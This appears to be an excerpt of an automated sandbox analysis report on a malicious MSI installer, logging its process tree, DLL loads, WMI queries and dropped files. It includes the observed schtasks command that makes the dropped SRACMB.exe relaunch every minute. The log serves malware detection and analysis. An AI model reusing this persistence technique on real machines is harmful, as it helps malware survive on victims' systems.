              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like 'MSI4976.tmp'
              Source: C:\Windows\Installer\MSI4976.tmpFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: sdlvrr.msiVirustotal: Detection: 50%
              Source: sdlvrr.msiReversingLabs: Detection: 42%
              Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\sdlvrr.msi"
              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4976.tmp "C:\Windows\Installer\MSI4976.tmp"
              Source: C:\Windows\Installer\MSI4976.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Installer\MSI4976.tmpProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe "C:\Users\user\AppData\Roaming\Windata\SRACMB.exe"
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exe C:\Users\user\AppData\Roaming\Windata\SRACMB.exe
              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSI4976.tmp "C:\Windows\Installer\MSI4976.tmp"Jump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1Jump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\VYZSPQ.vbsJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1Jump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: version.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: wsock32.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: VYZSPQ.lnk.3.drLNK file: ..\..\..\..\..\Windata\SRACMB.exe
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_0048B0C0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,3_2_0048B0C0
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00328D99 push edi; retn 0000h3_2_00328D9B
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00328F0E push F7FFFFFFh; retn 0000h3_2_00328F13
              Source: C:\Windows\Installer\MSI4976.tmpCode function: 3_2_00347795 push ecx; ret 3_2_003477A8
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000B8D99 push edi; retn 0000h8_2_000B8D9B
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000B8F0E push F7FFFFFFh; retn 0000h8_2_000B8F13
              Source: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeCode function: 8_2_000D7795 push ecx; ret 8_2_000D77A8
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1

              Persistence and Installation Behavior

              barindex
              Drops executables to the windows directory (C:\Windows) and starts them
              Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSI4976.tmpJump to behavior
              Source: C:\Windows\Installer\MSI4976.tmpFile created: C:\Users\user\AppData\Roaming\Windata\SRACMB.exeJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4976.tmpJump to dropped file
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4976.tmpJump to dropped file

              Boot Survival

              barindex
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn VYZSPQ.exe /tr C:\Users\user\AppData\Roaming\Windata\SRACMB.exe /sc minute /mo 1
